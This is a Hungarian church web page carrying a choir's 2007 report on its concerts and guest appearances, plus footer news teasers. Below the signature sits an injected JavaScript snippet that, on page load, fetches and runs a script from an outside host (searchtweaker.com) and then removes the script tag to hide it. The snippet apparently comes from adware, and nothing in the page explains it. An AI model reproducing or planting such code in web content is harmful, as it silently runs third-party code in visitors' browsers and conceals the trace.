Nyomtat Elküld Olvasási nézet

Énekkarunkról 2007-ben

Év vége felé közeledve gazdag tevékenységről számolhatunkk be az énekkarunk éves munkáját és szolgálatait tekintve. Korábban már hírt adtunk az év első részében történtekről, így azokról most csak röviden emlékezünk meg.
A már szokásos év eleji, ökumenikus héten történt fellépésünket követően a sárospataki gyülekezet lelkésze, ifjabb Virágh Sándor által szervezett jótékonysági hangversenyre voltunk hivatalosak, amelyet a templomuk régi orgonájának felújítása érdekében hirdettek meg Virágvasárnapra. A hangversenyen a két sárospataki énekkarral közösen vettünk részt, ahol külön-külön és együttesen is szerepeltünk Gárdonyi Zsolt és Gárdonyi Zoltán, Kodály Zoltán, valamint Birtalan József alkalomhoz illő műveivel.
Megjegyzendő itt, hogy a 2007-es esztendő Kodály élete szempontjából kettős évfordulónak számít, mert 125 éve született, és 40 évvel ezelőtt adta vissza lelkét a Teremtőnek. Életének 85 éve alatt számos művel gazdagította a magyar zenekultúrán belül a református ének- és zeneirodalmat is.
Nem sokkal ez után, Anyák Napján a Miskolc-Alsóvárosi templomban szolgált énekkarunk lelkészeinkkel együtt az ottani gyülekezet és annak vezetői előtt, amely egy kedves szeretetvendégséggel zárult.
Május közepén szintén egy meghívásnak tettünk eleget, amikor is Kolozsvárott vendégszerepeltünk két helyen és két alkalommal, amely városban egyébként korábban a Birtalan-házaspár végezte zenei tanulmányait. A rövid ott tartózkodásunk alatt kevés időnk maradt az ősi város nevezetességeinek megtekintésére, de kárpótolt bennünket a kissé fárasztó út és testi törődés ellenében itt is a házigazdák szeretetteljes fogadtatása. Szeptember közepén ismét erdélyi település volt a következő fellépésünk helyszíne, nevezetesen Kalotaszentkirály. Gyönyörű táj, míves népi kultúra és hagyományok, lelkes, kedves református lakosság. Ady Endre költői szavai szerint;- " pompás magyarok" élnek itt, a Kalota partján.
A nyár nagy részében Birtalan József őszre tervezett szerzői estjére készültünk, amely szeptember 30-án, elképzeléseink és terveink szerint ünnepélyes keretek között meg is valósult. Ez alkalom a nyolcvanadik születésnapjához közeledő ünnepelten kívül egyben a Zene Világnapja előtti tisztelgést is jelentette, ugyanakkor alkalmat adott arra, hogy a minket korábban szeretettel fogadott énekkarokat egy viszontszereplésre invitáljuk és vendégül láthassuk. Ez úton is köszönjük támogatóinknak, hogy e nagyszabású rendezvényünk ünnepélyes, és magas színvonalú keretek között megvalósulhatott. Ugyanakkor természetesen a résztvevők, és fellépők körének is hálával tartozunk a szép és felejthetetlen hangulatú estért.
Novemberben részesei voltunk az 5 éve alakult Mezőkeresztesi Kamarakórus jubileumi ünnepségének, amely az ottani református templomban zajlott meghívott énekkarok részvételével, és a hangverseny utáni szívélyes vendéglátással. Megjegyzendő; az énekkaraink közötti szoros kapcsolat annak is köszönhető, hogy a Birtalan-házaspár vezeti az ottani két énekkart is. E hónapban részesei voltunk még a Tiszai Vegyi Kombinát, mint ez évi fő szponzorunk törzsgárda ünnepségének, amelyen erre az alkalomra válogatott műveket adtunk elő.
December 16.-án délelőtt a szederkényi, míg délután a tiszaújvárosi református templomban adtunk szépszámú közönség előtt nagysikerü lelekemelő adventi és karácsonyi koncertet. December 22.-én Tiszaújváros főterén léptünk fel egy szép karácsonyi műsorral,míg Advent negyedik vasárnapján a tiszapalkonyai református gyülekezet szeretetteljes meghívásának tettünk eleget. Reményeink és a kapott pozitiv visszajelzések alapján bizhatunk abban,hogy fenti műsorainkal is sikerült hozzájárulnunk Krisztus urunk áldott születésnapjára való készülődés hangulatához.


2007-12-23

Fekete Béla / /Szutor István




(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Copyright © 2008 Parókia Portál, Minden jog fentartva.

Impresszum / Média Ajánlat / Kapcsolat / Hírlevél

Látogatók ma: 28, összesen: 98472

  • 2024. április 22., hétfő

    „Az esperesi szolgálat nem plecsni, nem kitüntetés, hanem lehetőség a szolgálatra.” Beiktatták Kovács Gergely esperest a Budapest-Déli Református Egyh...
  • 2024. április 22., hétfő

    Baráti ölelések, szakmai beszélgetések, keresztyén légkör fogadta a lelkipásztorokat, hittanoktatókat és vallástanárokat a Dunamelléki Katechetikai Tá...
  • 2024. április 21., vasárnap

    Közelebb a teremtett világhoz, közelebb egymáshoz, közelebb az Ige megéléséhez. A Gyökössy Intézet a lelkészeket hívja ki a mindennapok terhei közül. ...
  • 2024. április 18., csütörtök

    Az egyházkerületi konferencia-központok helyzetéről, a Kákicson nyíló ifjúsági házról és az elsőként megválasztott presbiterek közelgő találkozójáról ...
  • 2024. április 17., szerda

    A HolddalaNap zenekar újra hangszőnyeget sző a csendből. Imádságban fogant koncertjükről Gulyás Anna énekessel, dalszerzővel beszélgettünk.
  • 2024. április 16., kedd

    Duráczky Bálint szociológus szerint a tradicionális keretek lebomlása az elköteleződés megerősödését hozhatja egyházunkban.
  • 2024. április 16., kedd

    A Református Pulmonológiai Centrumban kapta meg Közép-Európában elsőként a gyógyszeres kezelést egy hatévesnél fiatalabb cisztás fibrózisos gyermek.
  • 2024. április 15., hétfő

    Alkohol- és drogfüggőségből szabadult srácok, közös munkájuk biztonságos közeget teremt számukra a reintegráció felé vezető úton.
  • 2024. április 15., hétfő

    Újraalapításának 30. évfordulójáért adott hálát a Kecskeméti Református Általános Iskola vasárnap.
  • 2024. április 12., péntek

    Százhúsz lelkész és missziói munkás találkozott a Káposztásmegyeri Református Gyülekezetben tartott Nagy-Budapesti Missziói Konferencián.